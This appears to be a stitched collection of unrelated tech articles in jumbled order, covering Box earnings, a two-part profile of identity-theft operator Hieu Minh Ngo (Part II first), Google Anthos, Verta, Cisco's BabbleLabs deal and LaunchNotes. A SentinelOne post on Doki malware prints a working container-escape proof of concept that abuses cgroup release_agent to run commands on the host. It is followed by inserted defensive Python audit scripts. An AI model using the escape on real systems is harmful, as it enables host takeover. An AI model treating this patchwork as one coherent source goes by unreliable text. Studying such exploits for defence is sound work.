Box benefits from digital transformation as it raises its growth forecast

Box has always been a bit of an enigma for Wall Street, and perhaps for enterprise software in general. Unlike vendors that shifted tools like HR, CRM or ERP to the cloud, Box has been building a way to manage content in the cloud. It’s been a little harder to understand than these other enterprise software stalwarts, but slowly but surely Box has shifted into a more efficient, and dare we say, profitable public company.

Yesterday the company filed its Q2 2021 earnings report and it was solid. In fact, the company reported revenue of $192.3 million. That’s an increase of 11% year over year and it beat analysts’ expectations of $189.6 million, according to the company. Meanwhile the guidance looked good too, moving from a range of $760 to $768 million for the year to a range of $767 to $770 million.

All of this points to a company that is finding its footing. Let’s not forget, Starboard Value bought a 7.5% stake in the company a year ago, yet the activist investor has mostly stayed quiet and Box seems to be rewarding its patience as the pandemic acts as a forcing function to move customers to the cloud faster — and that seems to be working in Box’s favor.

Let’s get profitable

Box CEO Aaron Levie has not been shy about talking about how the pandemic has pushed companies to move to the cloud much more quickly than they probably would have. He said as a digital company, he was able to move his employees to work from home and remain efficient because tools like Slack, Zoom, Okta and, yes, Box were in place to help them do that.

All of that helped keep the business going, and even thriving, through the extremely difficult times the pandemic has wrought. “We’re fortunate about how we’ve been able to execute in this environment. It helps that we’re 100% SaaS, and we’ve got a great digital engine to perform the business,” he said.

He added, “And at the same time, as we’ve talked about, we’ve been driving greater profitability. So the efficiency of the businesses has also improved dramatically, and the result was that overall we had a very strong quarter with better growth than expected and better profitability than expected. As a result, we were able to raise our targets on both revenue growth and profitability for the rest of the year,” Levie told TechCrunch.

Let’s get digital

Box is seeing existing customers and new customers alike moving more rapidly to the cloud, and that’s working in its favor. Levie believes that companies are in the process of reassessing their short and longer term digital strategy right now, and looking at what workloads they’ll be moving to the cloud, whether that’s cloud infrastructure, security in the cloud or content.

“Really customers are going to be trying to find a way to be able to shift their most important data and their most important content to the cloud, and that’s what we’re seeing play out within our customer base,” Levie said.

He added, “It’s not really a question anymore if you’re going to go to the cloud, it’s which cloud are you going to go to. And we’ve obviously been very focused on trying to build that leading platform for companies that want to be able to move their data to a cloud environment and be able to manage it securely, drive workflows on it, integrate it across our applications and that’s what we’re seeing,” he said.

That translated into a 60% increase quarter over quarter on the number of large deals over $100,000, and the company crossed 100,000 customers globally on the platform in the most recent quarter, so the approach seems to be working.

Let’s keep building

As with Salesforce a generation earlier, Box decided to build its product set on a platform of services. It enabled customers to tap into these base services like encryption, workflow and metadata and build their own customizations or even fully functional applications by taking advantage of the tools that Box has already built.

Much like Salesforce president and COO Bret Taylor told TechCrunch recently, that platform approach has been an integral part of its success, and Levie sees it similarly for Box, calling it fundamental to his company’s success as well.

“We would not be here without that platform strategy,” he said. “Because we think about Box as a platform architecture, and we’ve built more and more capabilities into that platform, that’s what is giving us this strategic advantage right now,” he said.

And that hasn’t just worked to help customers using Box, it also helps Box itself to develop new capabilities more rapidly, something that has been absolutely essential during this pandemic when the company has had to react quickly to rapidly changing customer requirements.

Levie is 15 years into his tenure as CEO of Box, but he still sees a company and a market that is just getting started. “The opportunity is only bigger, and it’s more addressable by our product and platform today than it has been at any point in our history. So I think we’re still in the very early stages of digital transformation, and we’re in the earliest stages for how document and content management works in this modern era.”

Confessions of an ID Theft Kingpin, Part II

Yesterday’s piece told the tale of Hieu Minh Ngo, a hacker the U.S. Secret Service described as someone who caused more material financial harm to more Americans than any other convicted cybercriminal. Ngo was recently deported back to his home country after serving more than seven years in prison for running multiple identity theft services. He now says he wants to use his experience to convince other cybercriminals to use their skills for good. Here’s a look at what happened after he got busted.

Hieu Minh Ngo, 29, in a recent photo.

Part I of this series ended with Ngo in handcuffs after disembarking a flight from his native Vietnam to Guam, where he believed he was going to meet another cybercriminal who’d promised to hook him up with the mother of all consumer data caches.

Ngo had been making more than $125,000 a month reselling ill-gotten access to some of the biggest data brokers on the planet. But the Secret Service discovered his various accounts at these data brokers and had them shut down one by one. Ngo became obsessed with restarting his business and maintaining his previous income. By this time, his ID theft services had earned roughly USD $3 million.

As this was going on, Secret Service agents used an intermediary to trick Ngo into thinking he’d trodden on the turf of another cybercriminal. From Part I:

The Secret Service contacted Ngo through an intermediary in the United Kingdom — a known, convicted cybercriminal who agreed to play along. The U.K.-based collaborator told Ngo he had personally shut down Ngo’s access to Experian because he had been there first and Ngo was interfering with his business.

“The U.K. guy told Ngo, ‘Hey, you’re treading on my turf, and I decided to lock you out. But as long as you’re paying a vig through me, your access won’t go away’,” the Secret Service’s Matt O’Neill recalled.

After several months of conversing with his apparent U.K.-based tormentor, Ngo agreed to meet him in Guam to finalize the deal. But immediately after stepping off of the plane in Guam, he was apprehended by Secret Service agents.

“One of the names of his identity theft services was findget[.]me,” O’Neill said. “We took that seriously, and we did like he asked.”

In an interview with KrebsOnSecurity, Ngo said he spent about two months in a Guam jail awaiting transfer to the United States. A month passed before he was allowed a 10-minute phone call to his family to explain what he’d gotten himself into.

“This was a very tough time,” Ngo said. “They were so sad and they were crying a lot.”

First stop on his prosecution tour was New Jersey, where he ultimately pleaded guilty to hacking into MicroBilt, the first of several data brokers whose consumer databases would power different iterations of his identity theft service over the years.

Next came New Hampshire, where another guilty plea forced him to testify in three different trials against identity thieves who had used his services for years. Among them was Lance Ealy, a serial ID thief from Dayton, Ohio who used Ngo’s service to purchase more than 350 “fullz” — a term used to describe a package of everything one would need to steal someone’s identity, including their Social Security number, mother’s maiden name, birth date, address, phone number, email address, bank account information and passwords.

Ealy used Ngo’s service primarily to conduct tax refund fraud with the U.S. Internal Revenue Service (IRS), claiming huge refunds in the names of ID theft victims who first learned of the fraud when they went to file their taxes and found someone else had beat them to it.

Ngo’s cooperation with the government ultimately led to 20 arrests, with a dozen of those defendants lured into the open by O’Neill and other Secret Service agents posing as Ngo.

The Secret Service had difficulty pinning down the exact amount of financial damage inflicted by Ngo’s various ID theft services over the years, primarily because those services only kept records of what customers searched for — not which records they purchased.

But based on the records they did have, the government estimated that Ngo’s service enabled approximately $1.1 billion in new account fraud at banks and retailers throughout the United States, and roughly $64 million in tax refund fraud with the states and the IRS.

“We interviewed a number of Ngo’s customers, who were pretty open about why they were using his services,” O’Neill said. “Many of them told us the same thing: Buying identities was so much better for them than stolen payment card data, because card data could be used once or twice before it was no good to them anymore. But identities could be used over and over again for years.”

O’Neill said he still marvels at the fact that Ngo’s name is practically unknown when compared to the world’s most infamous credit card thieves, some of whom were responsible for stealing hundreds of millions of cards from big box retail merchants.

“I don’t know of anyone who has come close to causing more material harm than Ngo did to the average American,” O’Neill said. “But most people have probably never heard of him.”

Ngo said he wasn’t surprised that his services were responsible for so much financial damage. But he was utterly unprepared to hear about the human toll. Throughout the court proceedings, Ngo sat through story after dreadful story of how his work had ruined the financial lives of people harmed by his services.

“When I was running the service, I didn’t really care because I didn’t know my customers and I didn’t know much about what they were doing with it,” Ngo said. “But during my case, the federal court received like 13,000 letters from victims who complained they lost their houses, jobs, or could no longer afford to buy a home or maintain their financial life because of me. That made me feel really bad, and I realized I’d been a terrible person.”

Even as he bounced from one federal detention facility to the next, Ngo always seemed to encounter ID theft victims wherever he went, including prison guards, healthcare workers and counselors.

“When I was in jail at Beaumont, Texas I talked to one of the correctional officers there who shared with me a story about her friend who lost her identity and then lost everything after that,” Ngo recalled. “Her whole life fell apart. I don’t know if that lady was one of my victims, but that story made me feel sick. I know now that what I was doing was just evil.”

Ngo’s former ID theft service usearching[.]info.

The Vietnamese hacker was released from prison a few months ago, and is now finishing up a mandatory three-week COVID-19 quarantine in a government-run facility near Ho Chi Minh city. In the final months of his detention, Ngo started reading everything he could get his hands on about computer and Internet security, and even authored a lengthy guide written for the average Internet user with advice about how to avoid getting hacked or becoming the victim of identity theft.

Ngo said while he would like to one day get a job working in some cybersecurity role, he’s in no hurry to do so. He’s already had at least one job offer in Vietnam, but he turned it down. He says he’s not ready to work yet, but is looking forward to spending time with his family — and specifically with his dad, who was recently diagnosed with Stage 4 cancer.

Longer term, Ngo says, he wants to mentor young people and help guide them on the right path, and away from cybercrime. He’s been brutally honest about his crimes and the destruction he’s caused. His LinkedIn profile states up front that he’s a convicted cybercriminal.

“I hope my work can help to change the minds of somebody, and if at least one person can change and turn to do good, I’m happy,” Ngo said. “It’s time for me to do something right, to give back to the world, because I know I can do something like this.”

Still, the recidivism rate among cybercriminals tends to be extremely high, and it would be easy for him to slip back into his old ways. After all, few people know as well as he does how best to exploit access to identity data.

O’Neill said he believes Ngo probably will keep his nose clean. But he added that Ngo’s service, if it existed today, probably would be even more successful and lucrative given the sheer number of scammers involved in using stolen identity data to defraud states and the federal government out of pandemic assistance loans and unemployment insurance benefits.

“It doesn’t appear he’s looking to get back into that life of crime,” O’Neill said. “But I firmly believe the people doing fraudulent small business loans and unemployment claims cut their teeth on his website. He was definitely the new coin of the realm.”

Ngo maintains he has zero interest in doing anything that might send him back to prison.

“Prison is a difficult place, but it gave me time to think about my life and my choices,” he said. “I am committing myself to do good and be better every day. I now know that money is just a part of life. It’s not everything and it can’t bring you true happiness. I hope those cybercriminals out there can learn from my experience. I hope they stop what they are doing and instead use their skills to help make the world better.”

Defeating “Doki” Malware and Container Escapes with Advanced Linux Behavioral Detection

Recently, Intezer cybersecurity researchers uncovered an attack utilizing a new Linux malware targeting publicly accessible Docker servers. The new malware, dubbed “Doki”, is part of an active Ngrok Mining Botnet campaign, primarily targeting exposed Docker servers hosted with popular cloud platforms such as AWS, Azure, and GCP among others. This sophisticated attack exploits misconfigurations in Docker features, which are both common and can be difficult to avoid, and drops the Doki backdoor as one of its payloads.

The initial report noted that “Doki” went unrecognized as malware on VirusTotal for over seven months and claimed it was a “fully undetected backdoor”. Combined with the initial infection’s container escape technique, this has led to fears that enterprises making use of Docker servers are left with little hope of detecting this new kind of attack in the wild, and pressure has naturally mounted on SecOps and DevOps teams to ensure all Docker instances are properly configured in a ‘best effort’ attempt to secure container and cloud workloads. However, while ensuring proper configuration is certainly a fundamental part of an effective security posture, it is also difficult and time consuming; more importantly, it is also not enough to stop attackers that have exploited existing misconfigurations or who go on to discover further container vulnerabilities.

In this post, we show how the container escape and Doki malware attack proceeds, step by step, and demonstrate that neither is “fully undetectable”. We show that this and similar threats can be detected and mitigated by means of SentinelOne’s Container Escape Protection, part of the SentinelOne Linux and Kubernetes Sentinel Agents.

Container Escape and Privilege Escalation

The main prize for the attackers is to achieve remote code execution on the host, and to this end they leverage the Docker API Create to set up their own containers. As previously reported, by using a legitimate Docker alpine image with curl installed, the attackers are able to use a bind configuration, which internally calls the mount syscall, to bind /tmpXXXXXX to the root directory of the hosting server.

Having managed to execute code in the container and get access to the host, the attackers have the option of implementing different persistence methods to overcome the challenge of the average short lifespan of any individual container. In this attack, the initial payload gains persistence in the early stages right after the bind mount configuration by mapping cron to the malicious container.
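One way to audit containers for the host bind mount described above, as an added example that is not code from the original post or from SentinelOne. It goes beyond this passage by also flagging the privilege settings discussed later under “Are There Other Container Escape Techniques?”. The container names and the sample docker inspect output are constructed, and the sensitive-path list beyond / and the cron directory is an assumption.

```python
import json

# Host paths that give a container control of the host when bind-mounted.
# "/" is the bind described above and the cron directory is the persistence
# location; the remaining entries are assumptions added for this example.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/spool/cron",
                        "/var/run/docker.sock", "/run/docker.sock")


def _bind_mounts(container):
    """Yield (host_source, destination, writable) for every bind mount."""
    seen = set()
    # "Mounts" reflects what the engine actually set up.
    for m in container.get("Mounts") or []:
        if m.get("Type") == "bind":
            key = (m.get("Source", ""), m.get("Destination", ""))
            seen.add(key)
            yield key[0], key[1], bool(m.get("RW", True))
    # "HostConfig.Binds" holds the requested "src:dst[:options]" strings.
    for spec in (container.get("HostConfig") or {}).get("Binds") or []:
        parts = spec.split(":")
        if len(parts) < 2 or not parts[0].startswith("/"):
            continue  # named volume, not a host path
        if (parts[0], parts[1]) in seen:
            continue  # already reported from "Mounts"
        seen.add((parts[0], parts[1]))
        options = parts[2].split(",") if len(parts) > 2 else []
        yield parts[0], parts[1], "ro" not in options


def _is_sensitive(source):
    source = source.rstrip("/") or "/"
    if source == "/":
        return True
    return any(source == p or source.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS)


def audit_container(container):
    """Return a sorted list of finding strings for one inspected container."""
    findings = set()
    for source, dest, writable in _bind_mounts(container):
        if _is_sensitive(source):
            mode = "rw" if writable else "ro"
            findings.add(f"host-bind {source} -> {dest} ({mode})")
    host_config = container.get("HostConfig") or {}
    if host_config.get("Privileged"):
        findings.add("privileged")
    caps = {c.upper().replace("CAP_", "", 1)
            for c in host_config.get("CapAdd") or []}
    for cap in sorted(caps & {"SYS_ADMIN", "ALL"}):
        findings.add(f"cap-add {cap}")
    for opt in host_config.get("SecurityOpt") or []:
        # Older engines store "apparmor:unconfined", newer ones use "=".
        if opt.replace(":", "=").lower() == "apparmor=unconfined":
            findings.add("apparmor unconfined")
    return sorted(findings)


def audit(inspect_output):
    """Audit the JSON array printed by `docker inspect <container>...`."""
    return {c.get("Name", c.get("Id", "?")).lstrip("/"): audit_container(c)
            for c in json.loads(inspect_output)}


# Constructed sample in the shape of `docker inspect` output.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/ctr-rootbind",
     "HostConfig": {"Binds": ["/:/tmpXXXXXX"], "Privileged": False,
                    "CapAdd": None, "SecurityOpt": None},
     "Mounts": [{"Type": "bind", "Source": "/",
                 "Destination": "/tmpXXXXXX", "RW": True}]},
    {"Name": "/ctr-cgroup-poc",
     "HostConfig": {"Binds": None, "Privileged": False,
                    "CapAdd": ["SYS_ADMIN"],
                    "SecurityOpt": ["apparmor=unconfined"]},
     "Mounts": []},
    {"Name": "/ctr-benign",
     "HostConfig": {"Binds": ["appdata:/data", "/srv/app/conf:/conf:ro"],
                    "Privileged": False, "CapAdd": None, "SecurityOpt": None},
     "Mounts": [{"Type": "volume", "Name": "appdata",
                 "Source": "/var/lib/docker/volumes/appdata/_data",
                 "Destination": "/data", "RW": True},
                {"Type": "bind", "Source": "/srv/app/conf",
                 "Destination": "/conf", "RW": False}]},
])

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        print(name, findings or "ok")
```

On a live host, the same function can be fed the output of docker inspect for all running containers instead of the constructed sample.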

Detecting the Container Escape with SentinelOne

As Gartner have previously pointed out, enterprises that try to use standard EPP solutions to protect server workloads are putting their business at risk. The only way to detect behaviors that involve correlation between container operations on a host’s file system is through an advanced AI technology that has visibility and understanding of the whole system – both host and containers – at once.

The SentinelOne agent is able to stop this attack precisely because it is constantly monitoring all activities and the malicious cron modifications are immediately detected, as shown below in the console’s threat page. Note how the threat indicators map the activity to MITRE ATT&CK TTPs for the analyst’s convenience:

The console also offers a useful graphical overview of the process tree:

And full logs are readily available showing all events from the current threat within the same interface:

Detecting the “Undetectable” Doki Malware Payload

SentinelOne’s agent is fully able to detect the container escape, but what about the malware that went undiscovered on VirusTotal for so many months and which was said to be “undetectable”?

Certainly, the malware and the initial attack are different steps that attackers could easily use separately; the malware could be dropped from different attack vectors, and it’s equally likely now that Doki has been “discovered” we will see new malware that has yet to be found on VirusTotal or any other malware repository.

Fortunately, the SentinelOne agent does not rely on reputation or cloud connectivity, but analyses processes in real time locally on the device using our advanced machine learning model to detect and protect against abnormal behavior. The on-device agent monitors every process, file and network activity in both the host and containers together, allowing it to capture suspicious and malicious activity autonomously. As the following images show, Doki’s behaviour is immediately recognized by the SentinelOne agent as malicious.

Are There Other Container Escape Techniques?

The particular container escape used in this attack is not the only one available to threat actors. Last year, a security assessment of Kubernetes and Docker presented a different Proof of Concept for achieving a container escape. The PoC relied on another misconfiguration where the container has elevated privileges, either by the --privileged flag or the AppArmor=unconfined flag. The escape can be triggered by an exploit using the Linux cgroups (control groups) mechanism and a ‘release_agent’ file.

Linux control groups are intended to allow multiple Docker containers to run in isolation while limiting and monitoring their use of resources. However, the ‘release_agent’ file contains a command that is executed by the kernel with full privileges on the host once the last task in a cgroup terminates. The PoC abuses this functionality by creating a ‘release_agent’ file with a malicious command, and then killing off all the tasks in the cgroup.

As the cgroup files are present both in the container and on the host, it is possible to modify them from either, which means an attacker can spawn a process inside the cgroup and gain code execution on the host.

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"

The SentinelOne agent’s Behavioral AI is able to detect this exploitation attempt, providing full visibility and the Storyline of the attack vector that led to this malicious activity.
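A host-side check for the release_agent abuse described above, as an added example that is not code from the original post or from SentinelOne. It assumes a cgroup v1 layout under /sys/fs/cgroup; the allowlisted systemd agent paths, the container-storage prefixes and the sample tree (including the EXAMPLE layer id) are assumptions constructed for illustration.

```python
import os
import shutil
import tempfile

# Release agents expected on a stock host (assumption: systemd's agent on
# its own named hierarchy under cgroup v1).
ALLOWED_AGENTS = {"/usr/lib/systemd/systemd-cgroups-agent",
                  "/lib/systemd/systemd-cgroups-agent"}
# Assumed default locations of container file systems on the host.
CONTAINER_STORAGE = ("/var/lib/docker/", "/var/lib/containerd/",
                     "/var/lib/containers/")


def _read(path):
    try:
        with open(path) as fh:
            return fh.read().strip()
    except OSError:
        return ""


def scan_release_agents(cgroup_root="/sys/fs/cgroup"):
    """Report hierarchies whose release_agent is set to an unexpected command."""
    findings = []
    for hierarchy in sorted(os.listdir(cgroup_root)):
        top = os.path.join(cgroup_root, hierarchy)
        if os.path.islink(top) or not os.path.isdir(top):
            continue  # skip alias symlinks such as cpu -> cpu,cpuacct
        agent = _read(os.path.join(top, "release_agent"))
        if not agent or agent in ALLOWED_AGENTS:
            continue
        # The agent only fires for cgroups with notify_on_release set to 1.
        armed = [os.path.relpath(dirpath, top)
                 for dirpath, _dirs, files in os.walk(top)
                 if "notify_on_release" in files
                 and _read(os.path.join(dirpath, "notify_on_release")) == "1"]
        findings.append({
            "hierarchy": hierarchy,
            "release_agent": agent,
            # An agent living inside a container layer is the PoC's signature.
            "in_container_storage": agent.startswith(CONTAINER_STORAGE),
            "armed_cgroups": sorted(armed),
        })
    return findings


def build_sample_tree(root):
    """Write a constructed cgroup v1 tree that mimics the state the PoC leaves."""
    layout = {
        "rdma/release_agent": "/var/lib/docker/overlay2/EXAMPLE/diff/cmd\n",
        "rdma/notify_on_release": "0\n",
        "rdma/x/notify_on_release": "1\n",
        "systemd/release_agent": "/usr/lib/systemd/systemd-cgroups-agent\n",
        "systemd/notify_on_release": "1\n",
        "memory/release_agent": "\n",
        "memory/notify_on_release": "0\n",
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def demo():
    """Scan the constructed tree and return the findings."""
    root = tempfile.mkdtemp()
    try:
        build_sample_tree(root)
        return scan_release_agents(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a host that uses cgroup v2 only, no release_agent files exist and the scan returns an empty list.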

Conclusion

It is a good strategy for defenders to be familiar with and execute core workload protection strategies, but as the recent Doki and container escape malware attacks show, as soon as there is a weak link in the chain, the attacker will take advantage and such strategies will fail to protect the enterprise.

Modern attack methods in containerized environments in the cloud are gaining traction and becoming increasingly sophisticated. Given the rewards, threat actors are clearly willing to expend more effort to stay under the radar and to defeat “best practices”.

To fully protect your assets, move to a container protection solution, powered by unmatched behavioral AI models, that can autonomously detect and block malware across both hosts and containers. SentinelOne’s server and workload protection is infrastructure agnostic and can be deployed either in containers themselves, or in the machines that host them, in servers or in the cloud. If you would like to see how SentinelOne’s solution can work for you, contact us for more information or request a free demo.


Google Cloud Anthos update brings support for on-prem, bare metal

When Google announced Anthos last year at Google Cloud Next, it was a pretty big deal. Here was a cloud company releasing a product that purported to help you move your applications between cloud companies like AWS and Azure — GCP’s competitors — because it’s what customers demanded.

Google tapped into genuine anxiety that tech leaders at customer companies are having over vendor lock-in in the cloud. Back in the client-server days, most of these folks got locked into a tech stack where they were at the mercy of the vendor. It’s something companies desperately want to avoid this go-round.

With Anthos, Google claimed you could take an application, package it in a container and then move it freely between clouds without having to rewrite it for the underlying infrastructure. It was and remains a compelling idea.

This year, the company is updating the product to include a couple of specialty workloads that didn’t get into version 1.0 last year. For starters, many customers aren’t just multi-cloud, meaning they have workloads on various infrastructure cloud vendors, they are also hybrid. That means they still have workloads on-prem in their own data centers, as well as in the cloud, and Google wanted to provide a way to include these workloads in Anthos.

Pali Bhat, VP of product and design at Google Cloud, says they have heard customers still have plenty of applications on premises and they want a way to package them as containerized, cloud-native workloads.

“They do want to be able to bring all of the benefits of cloud to both their own data centers, but also to any cloud they choose to use. And what Anthos enables them to do is go on this journey of modernization and digital transformation and be able to take advantage of it by writing once and running it anywhere, and that’s a really cool vision,” Bhat said.

And while some companies have made the move from on prem to the cloud, they still want the comfort of working on bare metal where they are the only tenant. The cloud typically offers a multi-tenant environment where users share space on servers, but bare metal gives a customer the benefits of being in the cloud with the ability to control their own destiny as they do on prem.

Customers were asking for Anthos to support bare metal, and so Google gave the people what they wanted and are releasing a beta of Anthos for bare metal this week, which Bhat says provides the answer for companies looking to have the benefits of Anthos at the edge.

“[The bare metal support] lets customers run Anthos […] at edge locations without using any hypervisor. So this is a huge benefit for customers who are looking to minimize unnecessary overhead and unlock new use cases, especially both in the cloud and on the edge,” Bhat said.

Anthos is part of a broader cloud modernization platform that Google Cloud is offering customers that includes GKE (the Kubernetes engine), Cloud Functions (the serverless offering) and Cloud Run (container run time platform). Bhat says this set of products taps into a couple of trends they are seeing with customers. First of all, as we move deeper into the pandemic, companies are looking for ways to cut costs while making a faster push to the cloud. The second is taking advantage of that push by becoming more agile and innovative.

It seems to be working. Bhat reports that in Q2, the company has seen a lot of interest. “One of the things in Q2 of 2020 that we’ve seen is that just Q2, over 100,000 companies used our application modernization platform and services,” he said.

MIT CSAIL grad launches machine learning platform with $10M Series A

Manasi Vartak, founder and CEO of Verta, conceived of the idea of the open-source project ModelDB database as a way to track versions of machine models while she was still in grad school at MIT. After she graduated, she decided to expand on that vision to build a product that could not only track model versions, but provide a way to operationalize them — and Verta was born.

Today, that company emerged from stealth with a $10 million Series A led by Intel Capital with participation from General Catalyst, which also led the company’s $1.7 million seed round.

Beyond providing a place to track model versioning, which ModelDB gave users, Vartak wanted to build a platform for data scientists to deploy those models into production, which has been difficult to do for many companies. She also wanted to make sure that once in production, they were still accurately reflecting the current data and not working with yesterday’s playbook.

“Verta can track if models are still valid and send out alarms when model performance changes unexpectedly,” the company explained.

Vartak says having that open-source project helped sell the company to investors early on, and acts as a way to attract possible customers now. “So for our seed round, it was definitely different because I was raising as a solo founder, a first-time founder right out of school, and that’s where having the open-source project was a huge win,” she said.

Certainly Mark Rostick, VP and senior managing director at lead investor Intel Capital, recognized that Verta was trying to solve a fundamental problem around machine learning model production. “Verta is addressing one of the key challenges companies face when adopting AI — bridging the gap between data scientists and developers to accelerate the deployment of machine learning models,” Rostick said.

While Vartak wasn’t ready to talk about how many customers she has just yet at this early stage of the company, she did say there were companies using the platform and getting models into production much faster.

Today, the company has 9 employees, and even at this early stage, she is taking diversity very seriously. In fact, her current employee makeup includes four Indian, three Caucasian, one Latino and one Asian, for a highly diverse mix. Her goal is to continue on this path as she builds the company. She is looking at getting to 15 employees this year, then doubling that by next year.

One thing Vartak also wants to do is have a 50/50 gender split, something she was able to achieve while at MIT in her various projects, and she wants to carry on with her company. She is also working with a third party, Sweat Equity Ventures, to help with recruiting diverse candidates.

She says that she likes to work iteratively to build the platform, while experimenting with new features, even with her small team. Right now, that involves interoperability with different machine learning tools out there like Amazon SageMaker or Kubeflow, the open-source machine learning pipeline tool.

“We realized that we need to meet customers where they are at their level of maturity. So we focused a lot the last couple of quarters on building a system that was interoperable so you can pick and choose the components kind of like Lego blocks and have a system that works end to end seamlessly.”

Cisco acquiring BabbleLabs to filter out the lawn mower screeching during your video conference

We’ve all been in a video conference, especially this year, when the neighbor started mowing the lawn or kids were playing outside your window — and it can get pretty loud. Cisco, which owns the WebEx video conferencing service, wants to do something about that, and late yesterday it announced it was going to acquire BabbleLabs, a startup that can help filter out background noise.

BabbleLabs has a very particular set of skills. It uses artificial intelligence to enhance the speaking voice, while filtering out those unwanted background noises that seem to occur whenever you happen to be in a meeting.

Interestingly enough, Cisco also sees this as a kind of privacy play by removing background conversation. Jeetu Patel, senior vice president and general manager in the Cisco Security and Applications Business Unit, says that this should go a long way toward improving the meeting experience for Cisco users.

“Their technology is going to provide our customers with yet another important innovation — automatically removing unwanted noise — to continue enabling exceptional Webex meeting experiences,” Patel, who was at Box for many years before joining Cisco, recently said in a statement.

In a blog post, BabbleLabs CEO and co-founder Chris Rowen wrote that conversations about being acquired by Cisco began just recently, and the deal came together pretty quickly. “We quickly reached a common view that merging BabbleLabs into the Cisco Collaboration team could accelerate our common vision dramatically,” he wrote.

BabbleLabs, which launched three years ago and raised $18 million, according to Crunchbase, had an interesting, but highly technical idea. That can sometimes be difficult to translate into a viable commercial product, but makes a highly attractive acquisition target for a company like Cisco.

Brent Leary, founder and principal analyst at CRM Essentials, says this acquisition could be seen as part of a broader industry consolidation. “We’re seeing consolidation taking place as the big web conferencing players are snapping up smaller players to round out their platforms,” he said.

He added, “WebEx may not be getting the attention that Zoom is, but it still has a significant presence in the enterprise, and this acquisition will allow them to keep improving their offering.”

The deal is expected to close in the current quarter after regulatory approval. Upon closing, BabbleLabs employees will become part of Cisco’s Collaboration Group.

LaunchNotes raises a $1.8M seed round to help companies communicate their software updates

LaunchNotes, a startup founded by the team behind Statuspage (which Atlassian later acquired) and the former head of marketing for Jira, today announced that it has raised a $1.8 million seed round co-led by Cowboy Ventures and Bull City Ventures. In addition, Tim Chen (general partner, Essence Ventures), Eric Wittman (chief growth officer, JLL Technologies), Kamakshi Sivaramakrishnan (VP Product, LinkedIn), Scot Wingo (co-founder and CEO, Spiffy), Lin-Hua Wu (chief communications officer, Dropbox) and Steve Klein (co-founder, Statuspage) are participating in this round.

The general idea behind LaunchNotes is to help businesses communicate their software updates to internal and external customers, something that has become increasingly important as the speed of software developments — and launches — has increased.

In addition to announcing the new funding round, LaunchNotes also today said that it will revamp its free tier to include the ability to communicate updates externally through public embeds as well. Previously, users needed to be on a paid plan to do so. The team also now allows businesses to customize the look and feel of these public streams more and it did away with subscriber limits.

“The reason we’re doing this is largely because [ … ] our long-term goal is to drive this shift in how release communications is done,” LaunchNotes co-founder Jake Brereton told me. “And the easiest way we can do that and get as many teams on board as possible is to lower the barrier to entry. Right now, that barrier to entry is asking users to pay for it.”

As Brereton told me, the company gained about 100 active users since it launched three months ago.

“I think, more than anything, our original thesis has been validated much more than I expected,” co-founder and CEO Tyler Davis added. “This problem really does scale with team size and in a very linear way and the interest that we’ve had has largely been on the much larger, enterprise team side. It’s just become very clear that that specific problem — while it is an issue for smaller teams — is much more of a critical problem as you grow and as you scale out into multiple teams and multiple business units.”

It’s maybe no surprise then that many of the next items on the team’s roadmap include features that large companies would want from a tool like this, including integrations with issue trackers, starting with Jira, single sign-on solutions and better team management tools.

“With that initial cohort being on the larger team size and more toward enterprise, issue tracker integration is a natural first step into our integrations platform, because a lot of change status currently lives in all these different tools and all these different processes and LaunchNotes is kind of the layer on top of that,” explained co-founder Tony Ramirez. “There are other integrations with things like feature flagging systems or git tools, where we want LaunchNotes to be the one place where people can go. And for these larger teams, that pain is more acute.”

The fact that LaunchNotes is essentially trying to create a system of record for product teams was also part of what attracted Cowboy Ventures founder Aileen Lee to the company.

“One of the things that I thought was kind of exciting is that this is potentially a new system of record for product people to use that kind of lives in different places right now — you might have some of it in Jira and some in Trello, or Asana, and some of that in Sheets and some of it in Airtable or Slack,” she said. She also believes that LaunchNotes will make a useful tool when bringing on new team members or handing off a product to another developer.

She also noted that the founding team, which she believes has the ideal background for building this product, was quite upfront about the fact that it needs to bring more diversity to the company. “They recognized, even in the first meeting, ‘Hey, we understand we’re three guys, and it’s really important to us to actually build out [diversity] on our cap table and in our investing team, but then also in all of our future hires so that we are setting our company up to be able to attract all kinds of people,’” she said.

Confessions of an ID Theft Kingpin, Part I

At the height of his cybercriminal career, the hacker known as “Hieupc” was earning $125,000 a month running a bustling identity theft service that siphoned consumer dossiers from some of the world’s top data brokers. That is, until his greed and ambition played straight into an elaborate snare set by the U.S. Secret Service. Now, after more than seven years in prison Hieupc is back in his home country and hoping to convince other would-be cybercrooks to use their computer skills for good.

Hieu Minh Ngo, in his teens.

For several years beginning around 2010, a lone teenager in Vietnam named Hieu Minh Ngo ran one of the Internet’s most profitable and popular services for selling “fullz,” stolen identity records that included a consumer’s name, date of birth, Social Security number and email and physical address.

Ngo got his treasure trove of consumer data by hacking and social engineering his way into a string of major data brokers. By the time the Secret Service caught up with him in 2013, he’d made over $3 million selling fullz data to identity thieves and organized crime rings operating throughout the United States.

Matt O’Neill is the Secret Service agent who in February 2013 successfully executed a scheme to lure Ngo out of Vietnam and into Guam, where the young hacker was arrested and sent to the mainland U.S. to face prosecution. O’Neill now heads the agency’s Global Investigative Operations Center, which supports investigations into transnational organized criminal groups.

O’Neill said he opened the investigation into Ngo’s identity theft business after reading about it in a 2011 KrebsOnSecurity story, “How Much is Your Identity Worth?” According to O’Neill, what’s remarkable about Ngo is that to this day his name is virtually unknown among the pantheon of infamous convicted cybercriminals, the majority of whom were busted for trafficking in huge quantities of stolen credit cards.

